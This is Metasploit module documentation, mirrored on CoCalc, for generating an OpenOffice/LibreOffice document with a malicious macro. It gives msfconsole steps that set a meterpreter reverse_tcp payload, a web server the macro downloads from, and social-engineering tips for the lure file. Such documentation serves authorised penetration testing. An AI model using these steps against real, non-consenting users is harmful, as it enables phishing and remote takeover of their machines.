CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/misc/openoffice_document_macro.md
Views: 1904

Vulnerable Application

This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also works against LibreOffice.

To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning.

  • Apache OpenOffice

  • LibreOffice

Verification Steps

To use this exploit, you must know the platform of the targeted user. The module supports Windows, Linux, and OSX. If the target is using Windows, then the exploit will generate the macro with malicious Powershell code inside. For other supported platforms, the exploit will generate Python code.

An example of using this module against Windows:

  1. Start msfconsole

  2. use exploit/multi/misc/openoffice_document_macro

  3. set target 0

  4. set payload windows/meterpreter/reverse_tcp

  5. exploit

An example of using this module against Linux or OSX:

  1. Start msfconsole

  2. use exploit/multi/misc/openoffice_document_macro

  3. set target 1

  4. set payload python/meterpreter/reverse_tcp

  5. exploit

Once started, the module will mainly do these things:

  1. It will start a payload handler.

  2. It will start a web server. This is used for the macro to download and execute our final payload.

  3. The malicious odt file. Send this to your targeted user.

Options

BODY

This option can be used to insert text to the malicious document.

Scenarios

openoffice_macro_demo

Modification

Since social engineering will play a big part in the success of the attack, you will most likely want to modify the odt file.

  1. To do so, first use msfconsole to generate the malicious odt file.

  2. Move the odt file to a system that has OpenOffice or LibreOffice

  3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro code unless you actually know what you're doing.